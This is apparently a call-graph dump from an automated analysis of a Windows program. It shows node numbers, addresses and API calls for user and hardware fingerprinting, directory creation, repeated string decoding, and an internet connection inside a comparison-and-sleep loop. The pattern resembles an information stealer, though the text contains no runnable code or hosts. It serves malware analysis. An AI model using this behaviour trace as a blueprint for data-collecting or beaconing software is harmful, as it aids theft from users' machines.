lstrcpyA 57301 ff7495 57300->57301 57302 ff070a lstrcpyA 57301->57302 57303 ff74ac 57302->57303 57304 ff082c 3 API calls 57303->57304 57305 ff74bf 57304->57305 58091 ff07ea 57305->58091 57308 ff07b0 lstrcpyA 57309 ff74d5 57308->57309 57310 ff74e7 CreateDirectoryA 57309->57310 58095 fe1ced 57310->58095 57314 ff7511 58179 ff7ccf 57314->58179 57316 ff7522 57317 ff07b0 lstrcpyA 57316->57317 57318 ff7539 57317->57318 57319 ff07b0 lstrcpyA 57318->57319 57320 ff7549 57319->57320 58186 ff073c 57320->58186 57323 ff082c 3 API calls 57324 ff7568 57323->57324 57325 ff07b0 lstrcpyA 57324->57325 57326 ff7571 57325->57326 57327 ff07ea 2 API calls 57326->57327 57328 ff758e 57327->57328 57329 ff07b0 lstrcpyA 57328->57329 57330 ff7597 57329->57330 57331 ff75a0 InternetOpenA InternetOpenA 57330->57331 57332 ff073c lstrcpyA 57331->57332 57333 ff75de 57332->57333 57334 ff070a lstrcpyA 57333->57334 57335 ff75ed 57334->57335 58190 ff0bc5 GetWindowsDirectoryA 57335->58190 57338 ff073c lstrcpyA 57339 ff7608 57338->57339 58208 fe4b20 57339->58208 57343 ff761b 57344 ff070a lstrcpyA 57343->57344 57345 ff7648 57344->57345 57346 fe1ced lstrcpyA 57345->57346 57347 ff7659 57346->57347 58359 fe5f2b 57347->58359 57351 ff7678 57352 ff070a lstrcpyA 57351->57352 57353 ff768b 57352->57353 57354 fe1ced lstrcpyA 57353->57354 57355 ff769c 57354->57355 57356 fe5f2b 43 API calls 57355->57356 57357 ff76a8 57356->57357 58533 ff341d strtok_s 57357->58533 57359 ff76bb 57360 ff070a lstrcpyA 57359->57360 57361 ff76ce 57360->57361 57362 fe1ced lstrcpyA 57361->57362 57363 ff76df 57362->57363 57364 fe5f2b 43 API calls 57363->57364 57365 ff76eb 57364->57365 58542 ff3554 strtok_s 57365->58542 57367 ff76fe 57368 fe1ced lstrcpyA 57367->57368 57369 ff770f 57368->57369 58549 ff3d63 57369->58549 57371 ff7714 57372 ff073c lstrcpyA 57371->57372 57373 ff7722 57372->57373 57374 ff070a lstrcpyA 57373->57374 57375 ff7730 57374->57375 58887 fe5229 57375->58887 57378 fe1ced lstrcpyA 57379 ff774c 57378->57379 58907 feec70 57379->58907 57500 fe2b6c 57499->57500 57501 fe4800 57499->57501 57500->57122 57502 fe4809 lstrlenA 57501->57502 57502->57500 57502->57502 57503->57202 57505 fe1375 57504->57505 57505->57228 57506 ff0e76 GetProcessHeap HeapAlloc GetUserNameA 57505->57506 57506->57232 57509 fe14d9 57507->57509 57508 fe14c9 lstrcmpiW 57508->57509 57510 fe14df 57508->57510 57509->57508 57509->57510 57510->57239 57510->57258 57512 ff0715 57511->57512 57513 ff0736 57512->57513 57514 ff072c lstrcpyA 57512->57514 57515 ff0e76 GetProcessHeap HeapAlloc GetUserNameA 57513->57515 57514->57513 57515->57276 57518 ff0853 57516->57518 57517 ff0879 57517->57279 57518->57517 57519 ff0866 lstrcpyA lstrcatA 57518->57519 57519->57517 57521 ff07bf 57520->57521 57522 ff07e6 57521->57522 57523 ff07de lstrcpyA 57521->57523 57522->57284 57523->57522 57525 ff0781 57524->57525 57526 ff07aa 57525->57526 57527 ff07a0 lstrcpyA 57525->57527 57526->57292 57527->57526 57529 fe47d9 3 API calls 57528->57529 57530 fe2f18 57529->57530 57531 fe47d9 3 API calls 57530->57531 57532 fe2f2f 57531->57532 57533 fe47d9 3 API calls 57532->57533 57534 fe2f46 57533->57534 57535 fe47d9 3 API calls 57534->57535 57536 fe2f5d 57535->57536 57537 fe47d9 3 API calls 57536->57537 57538 fe2f76 57537->57538 57539 fe47d9 3 API calls 57538->57539 57540 fe2f8d 57539->57540 57541 fe47d9 3 API calls 57540->57541 57542 fe2fa4 57541->57542 57543 fe47d9 3 API calls 57542->57543 57544 fe2fbb 57543->57544 57545 fe47d9 3 API calls 57544->57545 57546 fe2fd5 57545->57546 57547 fe47d9 3 API calls 57546->57547 57548 fe2fec 57547->57548 57549 fe47d9 3 API calls 57548->57549 57550 fe3002 57549->57550 57551 fe47d9 3 API calls 57550->57551 57552 fe3019 57551->57552 57553 fe47d9 3 API calls 57552->57553 57554 fe3030 57553->57554 57555 fe47d9 3 API calls 57554->57555 57556 fe3047 57555->57556 57557 fe47d9 3 API calls 57556->57557 57558 fe305e 57557->57558 57559 fe47d9 3 API calls 57558->57559 57560 fe3075 57559->57560 57561 fe47d9 3 API calls 57560->57561 57562 fe308c 57561->57562 57563 fe47d9 3 API calls 57562->57563 57564 fe30a3 57563->57564 57565 fe47d9 3 API calls 57564->57565 57566 fe30ba 57565->57566 57567 fe47d9 3 API calls 57566->57567 57568 fe30d0 57567->57568 57569 fe47d9 3 API calls 57568->57569 57570 fe30e7 57569->57570 57571 fe47d9 3 API calls 57570->57571 57572 fe3100 57571->57572 57573 fe47d9 3 API calls 57572->57573 57574 fe3114 57573->57574 57575 fe47d9 3 API calls 57574->57575 57576 fe312b 57575->57576 57577 fe47d9 3 API calls 57576->57577 57578 fe3145 57577->57578 57579 fe47d9 3 API calls 57578->57579 57580 fe315c 57579->57580 57581 fe47d9 3 API calls 57580->57581 57582 fe3173 57581->57582 57583 fe47d9 3 API calls 57582->57583 57584 fe318a 57583->57584 57585 fe47d9 3 API calls 57584->57585 57586 fe31a0 57585->57586 57587 fe47d9 3 API calls 57586->57587 57588 fe31b6 57587->57588 57589 fe47d9 3 API calls 57588->57589 57590 fe31cd 57589->57590 57591 fe47d9 3 API calls 57590->57591 57592 fe31e3 57591->57592 57593 fe47d9 3 API calls 57592->57593 57594 fe31fd 57593->57594 57595 fe47d9 3 API calls 57594->57595 57596 fe3214 57595->57596 57597 fe47d9 3 API calls 57596->57597 57598 fe322b 57597->57598 57599 fe47d9 3 API calls 57598->57599 57600 fe3241 57599->57600 57601 fe47d9 3 API calls 57600->57601 57602 fe3258 57601->57602 57603 fe47d9 3 API calls 57602->57603 57604 fe326f 57603->57604 57605 fe47d9 3 API calls 57604->57605 57606 fe3286 57605->57606 57607 fe47d9 3 API calls 57606->57607 57608 fe329c 57607->57608 57609 fe47d9 3 API calls 57608->57609 57610 fe32b3 57609->57610 57611 fe47d9 3 API calls 57610->57611 57612 fe32ca 57611->57612 57613 fe47d9 3 API calls 57612->57613 57614 fe32e1 57613->57614 57615 fe47d9 3 API calls 57614->57615 57616 fe32f7 57615->57616 57617 fe47d9 3 API calls 57616->57617 57618 fe330d 57617->57618 57619 fe47d9 3 API calls 57618->57619 57620 fe3324 57619->57620 57621 fe47d9 3 API calls 57620->57621 57622 fe333a 57621->57622 57623 fe47d9 3 API calls 57622->57623 57624 fe334e 57623->57624 57625 fe47d9 3 API calls 57624->57625 57626 fe3365 57625->57626 57627 fe47d9 3 API calls 57626->57627 57628 fe337b 57627->57628 57629 fe47d9 3 API calls 57628->57629 57630 fe3392 57629->57630 57631 fe47d9 3 API calls 57630->57631 57632 fe33a9 57631->57632 57633 fe47d9 3 API calls 57632->57633 57634 fe33c0 57633->57634 57635 fe47d9 3 API calls 57634->57635 57636 fe33d7 57635->57636 57637 fe47d9 3 API calls 57636->57637 57638 fe33ee 57637->57638 57639 fe47d9 3 API calls 57638->57639 57640 fe3405 57639->57640 57641 fe47d9 3 API calls 57640->57641 57642 fe341f 57641->57642 57643 fe47d9 3 API calls 57642->57643 57644 fe3436 57643->57644 57645 fe47d9 3 API calls 57644->57645 57646 fe344d 57645->57646 57647 fe47d9 3 API calls 57646->57647 57648 fe3464 57647->57648 57649 fe47d9 3 API calls 57648->57649 57650 fe347b 57649->57650 57651 fe47d9 3 API calls 57650->57651 57652 fe3492 57651->57652 57653 fe47d9 3 API calls 57652->57653 57654 fe34a9 57653->57654 57655 fe47d9 3 API calls 57654->57655 57656 fe34c0 57655->57656 57657 fe47d9 3 API calls 57656->57657 57658 fe34da 57657->57658 57659 fe47d9 3 API calls 57658->57659 57660 fe34f1 57659->57660 57661 fe47d9 3 API calls 57660->57661 57662 fe3508 57661->57662 57663 fe47d9 3 API calls 57662->57663 57664 fe351f 57663->57664 57665 fe47d9 3 API calls 57664->57665 57666 fe3536 57665->57666 57667 fe47d9 3 API calls 57666->57667 57668 fe354d 57667->57668 57669 fe47d9 3 API calls 57668->57669 57670 fe3564 57669->57670 57671 fe47d9 3 API calls 57670->57671 57672 fe357b 57671->57672 57673 fe47d9 3 API calls 57672->57673 57674 fe3595 57673->57674 57675 fe47d9 3 API calls 57674->57675 57676 fe35ac 57675->57676 57677 fe47d9 3 API calls 57676->57677 57678 fe35c3 57677->57678 57679 fe47d9 3 API calls 57678->57679 57680 fe35da 57679->57680 57681 fe47d9 3 API calls 57680->57681 57682 fe35f1 57681->57682 57683 fe47d9 3 API calls 57682->57683 57684 fe3608 57683->57684 57685 fe47d9 3 API calls 57684->57685 57686 fe361e 57685->57686 57687 fe47d9 3 API calls 57686->57687 57688 fe3634 57687->57688 57689 fe47d9 3 API calls 57688->57689 57690 fe364e 57689->57690 57691 fe47d9 3 API calls 57690->57691 57692 fe3665 57691->57692 57693 fe47d9 3 API calls 57692->57693 57694 fe367c 57693->57694 57695 fe47d9 3 API calls 57694->57695 57696 fe3692 57695->57696 57697 fe47d9 3 API calls 57696->57697 57698 fe36a9 57697->57698 57699 fe47d9 3 API calls 57698->57699 57700 fe36c0 57699->57700 57701 fe47d9 3 API calls 57700->57701 57702 fe36d4 57701->57702 57703 fe47d9 3 API calls 57702->57703 57704 fe36ea 57703->57704 57705 fe47d9 3 API calls 57704->57705 57706 fe3704 57705->57706 57707 fe47d9 3 API calls 57706->57707 57708 fe371b 57707->57708 57709 fe47d9 3 API calls 57708->57709 57710 fe3732 57709->57710 57711 fe47d9 3 API calls 57710->57711 57712 fe3749 57711->57712 57713 fe47d9 3 API calls 57712->57713 57714 fe3760 57713->57714 57715 fe47d9 3 API calls 57714->57715 57716 fe3777 57715->57716 57717 fe47d9 3 API calls 57716->57717 57718 fe378b 57717->57718 57719 fe47d9 3 API calls 57718->57719 57720 fe37a2 57719->57720 57721 fe47d9 3 API calls 57720->57721 57722 fe37bc 57721->57722 57723 fe47d9 3 API calls 57722->57723 57724 fe37d3 57723->57724 57725 fe47d9 3 API calls 57724->57725 57726 fe37e7 57725->57726 57727 fe47d9 3 API calls 57726->57727 57728 fe37fb 57727->57728 57729 fe47d9 3 API calls 57728->57729 57730 fe3812 57729->57730 57731 fe47d9 3 API calls 57730->57731 57732 fe3829 57731->57732 57733 fe47d9 3 API calls 57732->57733 57734 fe3840 57733->57734 57735 fe47d9 3 API calls 57734->57735 57736 fe3857 57735->57736 57737 fe47d9 3 API calls 57736->57737 57738 fe3871 57737->57738 57739 fe47d9 3 API calls 57738->57739 57740 fe3888 57739->57740 57741 fe47d9 3 API calls 57740->57741 57742 fe389f 57741->57742 57743 fe47d9 3 API calls 57742->57743 57744 fe38b6 57743->57744 57745 fe47d9 3 API calls 57744->57745 57746 fe38cc 57745->57746 57747 fe47d9 3 API calls 57746->57747 57748 fe38e3 57747->57748 57749 fe47d9 3 API calls 57748->57749 57750 fe38f7 57749->57750 57751 fe47d9 3 API calls 57750->57751 57752 fe390e 57751->57752 57753 fe47d9 3 API calls 57752->57753 57754 fe3928 57753->57754 57755 fe47d9 3 API calls 57754->57755 57756 fe393f 57755->57756 57757 fe47d9 3 API calls 57756->57757 57758 fe3956 57757->57758 57759 fe47d9 3 API calls 57758->57759 57760 fe396d 57759->57760 57761 fe47d9 3 API calls 57760->57761 57762 fe3984 57761->57762 57763 fe47d9 3 API calls 57762->57763 57764 fe399b 57763->57764 57765 fe47d9 3 API calls 57764->57765 57766 fe39b2 57765->57766 57767 fe47d9 3 API calls 57766->57767 57768 fe39c9 57767->57768 57769 fe47d9 3 API calls 57768->57769 57770 fe39e3 57769->57770 57771 fe47d9 3 API calls 57770->57771 57772 fe39fa 57771->57772 57773 fe47d9 3 API calls 57772->57773 57774 fe3a11 57773->57774 57775 fe47d9 3 API calls 57774->57775 57776 fe3a28 57775->57776 57777 fe47d9 3 API calls 57776->57777 57778 fe3a3f 57777->57778 57779 fe47d9 3 API calls 57778->57779 57780 fe3a56 57779->57780 57781 fe47d9 3 API calls 57780->57781 57782 fe3a6d 57781->57782 57783 fe47d9 3 API calls 57782->57783 57784 fe3a81 57783->57784 57785 fe47d9 3 API calls 57784->57785 57786 fe3a9b 57785->57786 57787 fe47d9 3 API calls 57786->57787 57788 fe3ab2 57787->57788 57789 fe47d9 3 API calls 57788->57789 57790 fe3ac8 57789->57790 57791 fe47d9 3 API calls 57790->57791 57792 fe3adf 57791->57792 57793 fe47d9 3 API calls 57792->57793 57794 fe3af6 57793->57794 57795 fe47d9 3 API calls 57794->57795 57796 fe3b0d 57795->57796 57797 fe47d9 3 API calls 57796->57797 57798 fe3b24 57797->57798 57799 fe47d9 3 API calls 57798->57799 57800 fe3b3b 57799->57800 57801 fe47d9 3 API calls 57800->57801 57802 fe3b52 57801->57802 57803 fe47d9 3 API calls 57802->57803 57804 fe3b66 57803->57804 57805 fe47d9 3 API calls 57804->57805 57806 fe3b7d 57805->57806 57807 fe47d9 3 API calls 57806->57807 57808 fe3b94 57807->57808 57809 fe47d9 3 API calls 57808->57809 57810 fe3bab 57809->57810 57811 fe47d9 3 API calls 57810->57811 57812 fe3bc2 57811->57812 57813 fe47d9 3 API calls 57812->57813 57814 fe3bd9 57813->57814 57815 fe47d9 3 API calls 57814->57815 57816 fe3bf0 57815->57816 57817 fe47d9 3 API calls 57816->57817 57818 fe3c0a 57817->57818 57819 fe47d9 3 API calls 57818->57819 57820 fe3c21 57819->57820 57821 fe47d9 3 API calls 57820->57821 57822 fe3c38 57821->57822 57823 fe47d9 3 API calls 57822->57823 57824 fe3c4f 57823->57824 57825 fe47d9 3 API calls 57824->57825 57826 fe3c66 57825->57826 57827 fe47d9 3 API calls 57826->57827 57828 fe3c7d 57827->57828 57829 fe47d9 3 API calls 57828->57829 57830 fe3c94 57829->57830 57831 fe47d9 3 API calls 57830->57831 57832 fe3ca8 57831->57832 57833 fe47d9 3 API calls 57832->57833 57834 fe3cc2 57833->57834 57835 fe47d9 3 API calls 57834->57835 57836 fe3cd9 57835->57836 57837 fe47d9 3 API calls 57836->57837 57838 fe3cf0 57837->57838 57839 fe47d9 3 API calls 57838->57839 57840 fe3d07 57839->57840 57841 fe47d9 3 API calls 57840->57841 57842 fe3d1d 57841->57842 57843 fe47d9 3 API calls 57842->57843 57844 fe3d34 57843->57844 57845 fe47d9 3 API calls 57844->57845 57846 fe3d48 57845->57846 57847 fe47d9 3 API calls 57846->57847 57848 fe3d5f 57847->57848 57849 fe47d9 3 API calls 57848->57849 57850 fe3d76 57849->57850 57851 fe47d9 3 API calls 57850->57851 57852 fe3d8d 57851->57852 57853 fe47d9 3 API calls 57852->57853 57854 fe3da4 57853->57854 57855 fe47d9 3 API calls 57854->57855 57856 fe3dbb 57855->57856 57857 fe47d9 3 API calls 57856->57857 57858 fe3dd2 57857->57858 57859 fe47d9 3 API calls 57858->57859 57860 fe3de9 57859->57860 57861 fe47d9 3 API calls 57860->57861 57862 fe3e00 57861->57862 57863 fe47d9 3 API calls 57862->57863 57864 fe3e17 57863->57864 57865 fe47d9 3 API calls 57864->57865 57866 fe3e31 57865->57866 57867 fe47d9 3 API calls 57866->57867 57868 fe3e48 57867->57868 57869 fe47d9 3 API calls 57868->57869 57870 fe3e5f 57869->57870 57871 fe47d9 3 API calls 57870->57871 57872 fe3e75 57871->57872 57873 fe47d9 3 API calls 57872->57873 57874 fe3e8c 57873->57874 57875 fe47d9 3 API calls 57874->57875 57876 fe3ea3 57875->57876 57877 fe47d9 3 API calls 57876->57877 57878 fe3eba 57877->57878 57879 fe47d9 3 API calls 57878->57879 57880 fe3ed1 57879->57880 57881 fe47d9 3 API calls 57880->57881 57882 fe3eeb 57881->57882 57883 fe47d9 3 API calls 57882->57883 57884 fe3f01 57883->57884 57885 fe47d9 3 API calls 57884->57885 57886 fe3f18 57885->57886 57887 fe47d9 3 API calls 57886->57887 57888 fe3f2f 57887->57888 57889 fe47d9 3 API calls 57888->57889 57890 fe3f46 57889->57890 57891 fe47d9 3 API calls 57890->57891 57892 fe3f5d 57891->57892 57893 fe47d9 3 API calls 57892->57893 57894 fe3f71 57893->57894 57895 fe47d9 3 API calls 57894->57895 57896 fe3f88 57895->57896 57897 fe47d9 3 API calls 57896->57897 57898 fe3fa2 57897->57898 57899 fe47d9 3 API calls 57898->57899 57900 fe3fb8 57899->57900 57901 fe47d9 3 API calls 57900->57901 57902 fe3fcf 57901->57902 57903 fe47d9 3 API calls 57902->57903 57904 fe3fe3 57903->57904 57905 fe47d9 3 API calls 57904->57905 57906 fe3ffa 57905->57906 57907 fe47d9 3 API calls 57906->57907 57908 fe4011 57907->57908 57909 fe47d9 3 API calls 57908->57909 57910 fe4028 57909->57910 57911 fe47d9 3 API calls 57910->57911 57912 fe403f 57911->57912 57913 fe47d9 3 API calls 57912->57913 57914 fe4058 57913->57914 57915 fe47d9 3 API calls 57914->57915 57916 fe406f 57915->57916 57917 fe47d9 3 API calls 57916->57917 57918 fe4085 57917->57918 57919 fe47d9 3 API calls 57918->57919 57920 fe4099 57919->57920 57921 fe47d9 3 API calls 57920->57921 57922 fe40b0 57921->57922 57923 fe47d9 3 API calls 57922->57923 57924 fe40c7 57923->57924 57925 fe47d9 3 API calls 57924->57925 57926 fe40de 57925->57926 57927 fe47d9 3 API calls 57926->57927 57928 fe40f5 57927->57928 57929 fe47d9 3 API calls 57928->57929 57930 fe410f 57929->57930 57931 fe47d9 3 API calls 57930->57931 57932 fe4126 57931->57932 57933 fe47d9 3 API calls 57932->57933 57934 fe413d 57933->57934 57935 fe47d9 3 API calls 57934->57935 57936 fe4154 57935->57936 57937 fe47d9 3 API calls 57936->57937 57938 fe416a 57937->57938 57939 fe47d9 3 API calls 57938->57939 57940 fe417e 57939->57940 57941 fe47d9 3 API calls 57940->57941 57942 fe4192 57941->57942 57943 fe47d9 3 API calls 57942->57943 57944 fe41a9 57943->57944 57945 fe47d9 3 API calls 57944->57945 57946 fe41c3 57945->57946 57947 fe47d9 3 API calls 57946->57947 57948 fe41d9 57947->57948 57949 fe47d9 3 API calls 57948->57949 57950 fe41f0 57949->57950 57951 fe47d9 3 API calls 57950->57951 57952 fe4207 57951->57952 57953 fe47d9 3 API calls 57952->57953 57954 fe421e 57953->57954 57955 fe47d9 3 API calls 57954->57955 57956 fe4235 57955->57956 57957 fe47d9 3 API calls 57956->57957 57958 fe4249 57957->57958 57959 fe47d9 3 API calls 57958->57959 57960 fe425f 57959->57960 57961 fe47d9 3 API calls 57960->57961 57962 fe4279 57961->57962 57963 fe47d9 3 API calls 57962->57963 57964 fe4290 57963->57964 57965 fe47d9 3 API calls 57964->57965 57966 fe42a7 57965->57966 57967 fe47d9 3 API calls 57966->57967 57968 fe42bd 57967->57968 57969 fe47d9 3 API calls 57968->57969 57970 fe42d4 57969->57970 57971 fe47d9 3 API calls 57970->57971 57972 fe42eb 57971->57972 57973 fe47d9 3 API calls 57972->57973 57974 fe4302 57973->57974 57975 fe47d9 3 API calls 57974->57975 57976 fe4316 57975->57976 57977 fe47d9 3 API calls 57976->57977 57978 fe432d 57977->57978 57979 fe47d9 3 API calls 57978->57979 57980 fe4344 57979->57980 57981 fe47d9 3 API calls 57980->57981 57982 fe435b 57981->57982 57983 fe47d9 3 API calls 57982->57983 57984 fe4372 57983->57984 57985 fe47d9 3 API calls 57984->57985 57986 fe4386 57985->57986 57987 fe47d9 3 API calls 57986->57987 57988 fe439d 57987->57988 57989 fe47d9 3 API calls 57988->57989 57990 fe43b4 57989->57990 57991 fe47d9 3 API calls 57990->57991 57992 fe43cb 57991->57992 57993 fe47d9 3 API calls 57992->57993 57994 fe43e2 57993->57994 57995 fe47d9 3 API calls 57994->57995 57996 fe43f9 57995->57996 57997 fe47d9 3 API calls 57996->57997 57998 fe440d 57997->57998 57999 fe47d9 3 API calls 57998->57999 58000 fe4424 57999->58000 58001 fe47d9 3 API calls 58000->58001 58002 fe443b 58001->58002 58003 fe47d9 3 API calls 58002->58003 58004 fe444f 58003->58004 58005 fe47d9 3 API calls 58004->58005 58006 fe4463 58005->58006 58007 fe47d9 3 API calls 58006->58007 58008 fe4477 58007->58008 58009 fe47d9 3 API calls 58008->58009 58010 fe4491 58009->58010 58011 fe47d9 3 API calls 58010->58011 58012 fe44a8 58011->58012 58013 fe47d9 3 API calls 58012->58013 58014 fe44be 58013->58014 58015 fe47d9 3 API calls 58014->58015 58016 fe44d5 58015->58016 58017 fe47d9 3 API calls 58016->58017 58018 fe44eb 58017->58018 58019 fe47d9 3 API calls 58018->58019 58020 fe4502 58019->58020 58021 fe47d9 3 API calls 58020->58021 58022 fe4519 58021->58022 58023 fe47d9 3 API calls 58022->58023 58024 fe452f 58023->58024 58025 fe47d9 3 API calls 58024->58025 58026 fe4549 58025->58026 58027 fe47d9 3 API calls 58026->58027 58028 fe4560 58027->58028 58029 fe47d9 3 API calls 58028->58029 58030 fe4577 58029->58030 58031 fe47d9 3 API calls 58030->58031 58032 fe458e 58031->58032 58033 fe47d9 3 API calls 58032->58033 58034 fe45a5 58033->58034 58035 fe47d9 3 API calls 58034->58035 58036 fe45bc 58035->58036 58037 fe47d9 3 API calls 58036->58037 58038 fe45d3 58037->58038 58039 fe47d9 3 API calls 58038->58039 58040 fe45ea 58039->58040 58041 fe47d9 3 API calls 58040->58041 58042 fe4603 58041->58042 58043 fe47d9 3 API calls 58042->58043 58044 fe461a 58043->58044 58045 fe47d9 3 API calls 58044->58045 58046 fe4633 58045->58046 58047 fe47d9 3 API calls 58046->58047 58048 fe4647 58047->58048 58049 fe47d9 3 API calls 58048->58049 58050 fe465e 58049->58050 58051 fe47d9 3 API calls 58050->58051 58052 fe4675 58051->58052 58053 fe47d9 3 API calls 58052->58053 58054 fe468c 58053->58054 58055 fe47d9 3 API calls 58054->58055 58056 fe46a3 58055->58056 58057 fe47d9 3 API calls 58056->58057 58058 fe46bd 58057->58058 58059 fe47d9 3 API calls 58058->58059 58060 fe46d4 58059->58060 58061 fe47d9 3 API calls 58060->58061 58062 fe46ea 58061->58062 58063 fe47d9 3 API calls 58062->58063 58064 fe4701 58063->58064 58065 fe47d9 3 API calls 58064->58065 58066 fe4718 58065->58066 58067 fe47d9 3 API calls 58066->58067 58068 fe472e 58067->58068 58069 fe47d9 3 API calls 58068->58069 58070 fe4745 58069->58070 58071 fe47d9 3 API calls 58070->58071 58072 fe4759 58071->58072 58073 fe47d9 3 API calls 58072->58073 58074 fe4772 58073->58074 58075 fe47d9 3 API calls 58074->58075 58076 fe4788 58075->58076 58077 fe47d9 3 API calls 58076->58077 58078 fe479f 58077->58078 58079 fe47d9 3 API calls 58078->58079 58080 fe47b6 58079->58080 58081 fe47d9 3 API calls 58080->58081 58082 fe47cd 58081->58082 58082->57296 58084 ff070a lstrcpyA 58083->58084 58085 ff1e8a 58084->58085 58086 ff070a lstrcpyA 58085->58086 58087 ff1e98 GetSystemTime 58086->58087 58088 ff1eb4 58087->58088 58089 ffcab4 ___init_ctype 5 API calls 58088->58089 58090 ff1eeb 58089->58090 58090->57300 58093 ff0804 58091->58093 58092 ff0828 58092->57308 58093->58092 58094 ff0816 lstrcpyA lstrcatA 58093->58094 58094->58092 58096 ff073c lstrcpyA 58095->58096 58097 fe1cf7 58096->58097 58098 ff073c lstrcpyA 58097->58098 58099 fe1d02 58098->58099 58100 ff073c lstrcpyA 58099->58100 58101 fe1d0d 58100->58101 58102 ff073c lstrcpyA 58101->58102 58103 fe1d24 58102->58103 58104 ff6b93 58103->58104 58105 ff076c 2 API calls 58104->58105 58106 ff6bc9 58105->58106 58107 ff076c 2 API calls 58106->58107 58108 ff6bd6 58107->58108 58109 ff076c 2 API calls 58108->58109 58110 ff6be3 58109->58110 58111 ff070a lstrcpyA 58110->58111 58112 ff6bf0 58111->58112 58113 ff070a lstrcpyA 58112->58113 58114 ff6bfd 58113->58114 58115 ff070a lstrcpyA 58114->58115 58116 ff6c0a 58115->58116 58117 ff070a lstrcpyA 58116->58117 58118 ff6c17 58117->58118 58119 ff070a lstrcpyA 58118->58119 58120 ff6c24 58119->58120 58121 ff070a lstrcpyA 58120->58121 58140 ff6c31 58121->58140 58124 ff6c75 StrCmpCA 58125 ff6cce StrCmpCA 58124->58125 58124->58140 58126 ff6eb1 58125->58126 58125->58140 58129 ff07b0 lstrcpyA 58126->58129 58130 ff6ebc 58129->58130 58132 ff070a lstrcpyA 58130->58132 58133 ff6ec9 58132->58133 58135 ff07b0 lstrcpyA 58133->58135 58134 fe1ced lstrcpyA 58134->58140 58139 ff6e09 58135->58139 58136 ff6a1b 28 API calls 58136->58140 58137 ff6aa3 33 API calls 58137->58140 58138 ff07b0 lstrcpyA 58138->58140 58141 ff070a lstrcpyA 58139->58141 58140->58124 58140->58125 58140->58134 58140->58136 58140->58137 58140->58138 58143 ff6d2e StrCmpCA 58140->58143 58145 ff6d87 StrCmpCA 58140->58145 58156 ff073c lstrcpyA 58140->58156 59048 fe29e8 58140->59048 59051 fe29f9 58140->59051 59054 fe2a1b 58140->59054 59057 fe2a2c 58140->59057 59067 fe2a0a lstrcpyA 58140->59067 59068 fe2a3d lstrcpyA 58140->59068 58142 ff6ee8 58141->58142 58144 ff07b0 lstrcpyA 58142->58144 58143->58140 58143->58145 58151 ff6ef2 58144->58151 58147 ff6d9d StrCmpCA 58145->58147 58148 ff6e80 58145->58148 58149 ff6e4f 58147->58149 58150 ff6db3 StrCmpCA 58147->58150 58152 ff07b0 lstrcpyA 58148->58152 58157 ff07b0 lstrcpyA 58149->58157 58154 ff6e1b 58150->58154 58155 ff6dc5 StrCmpCA 58150->58155 59060 ff6f7f 58151->59060 58153 ff6e8b 58152->58153 58159 ff070a lstrcpyA 58153->58159 58163 ff07b0 lstrcpyA 58154->58163 58160 ff6de7 58155->58160 58161 ff6dd7 Sleep 58155->58161 58156->58140 58162 ff6e5a 58157->58162 58164 ff6e98 58159->58164 58165 ff07b0 lstrcpyA 58160->58165 58161->58140 58166 ff070a lstrcpyA 58162->58166 58167 ff6e26 58163->58167 58168 ff07b0 lstrcpyA 58164->58168 58169 ff6df2 58165->58169 58170 ff6e67 58166->58170 58171 ff070a lstrcpyA 58167->58171 58168->58139 58173 ff070a lstrcpyA 58169->58173 58174 ff07b0 lstrcpyA 58170->58174 58172 ff6e33 58171->58172 58175 ff07b0 lstrcpyA 58172->58175 58176 ff6dff 58173->58176 58174->58139 58175->58139 58177 ff07b0 lstrcpyA 58176->58177 58177->58139 58178 ff6f05 58178->57314 58180 ff07b0 lstrcpyA 58179->58180 58181 ff7cd9 58180->58181 58182 ff07b0 lstrcpyA 58181->58182 58183 ff7ce4 58182->58183 58184 ff07b0 lstrcpyA 58183->58184 58185 ff7cef 58184->58185 58185->57316 58187 ff074c 58186->58187 58188 ff0761 58187->58188 58189 ff0759 lstrcpyA 58187->58189 58188->57323 58189->58188 58191 ff0c09 GetVolumeInformationA 58190->58191 58192 ff0c02 58190->58192 58193 ff0c70 58191->58193 58192->58191 58193->58193 58194 ff0c85 GetProcessHeap HeapAlloc 58193->58194 58195 ff0caf wsprintfA lstrcatA 58194->58195 58196 ff0ca0 58194->58196 59069 ff18a7 GetCurrentHwProfileA 58195->59069 58197 ff070a lstrcpyA 58196->58197 58200 ff0ca8 58197->58200 58199 ff0cea lstrlenA 59085 ff27a7 lstrcpyA malloc strncpy 58199->59085 58203 ffcab4 ___init_ctype 5 API calls 58200->58203 58202 ff0d0d lstrcatA 58205 ff0d24 58202->58205 58204 ff0d51 58203->58204 58204->57338 58206 ff070a lstrcpyA 58205->58206 58207 ff0d3b 58206->58207 58207->58200 58209 ff073c lstrcpyA 58208->58209 58210 fe4b4b 58209->58210 59089 fe4aa7 58210->59089 58212 fe4b57 58213 ff070a lstrcpyA 58212->58213 58214 fe4b73 58213->58214 58215 ff070a lstrcpyA 58214->58215 58216 fe4b83 58215->58216 58217 ff070a lstrcpyA 58216->58217 58218 fe4b93 58217->58218 58219 ff070a lstrcpyA 58218->58219 58220 fe4ba3 58219->58220 58221 ff070a lstrcpyA 58220->58221 58222 fe4bb3 InternetOpenA StrCmpCA 58221->58222 58223 fe4be7 58222->58223 58224 fe4bf9 58223->58224 58225 fe5186 InternetCloseHandle 58223->58225 58226 ff1e6d 7 API calls 58224->58226 58236 fe51d3 58225->58236 58227 fe4c07 58226->58227 58228 ff07ea 2 API calls 58227->58228 58229 fe4c1a 58228->58229 58230 ff07b0 lstrcpyA 58229->58230 58231 fe4c25 58230->58231 58232 ff082c 3 API calls 58231->58232 58233 fe4c51 58232->58233 58234 ff07b0 lstrcpyA 58233->58234 58235 fe4c5c 58234->58235 58237 ff082c 3 API calls 58235->58237 58238 ffcab4 ___init_ctype 5 API calls 58236->58238 58239 fe4c7d 58237->58239 58240 fe5227 58238->58240 58241 ff07b0 lstrcpyA 58239->58241 58342 ff3b9f StrCmpCA 58240->58342 58242 fe4c88 58241->58242 58243 ff07ea 2 API calls 58242->58243 58244 fe4caa 58243->58244 58245 ff07b0 lstrcpyA 58244->58245 58246 fe4cb5 58245->58246 58247 ff082c 3 API calls 58246->58247 58248 fe4cd6 58247->58248 58249 ff07b0 lstrcpyA 58248->58249 58250 fe4ce1 58249->58250 58251 ff082c 3 API calls 58250->58251 58252 fe4d02 58251->58252 58253 ff07b0 lstrcpyA 58252->58253 58254 fe4d0d 58253->58254 58255 ff082c 3 API calls 58254->58255 58256 fe4d2f 58255->58256 58257 ff07ea 2 API calls 58256->58257 58258 fe4d3a 58257->58258 58259 ff07b0 lstrcpyA 58258->58259 58260 fe4d45 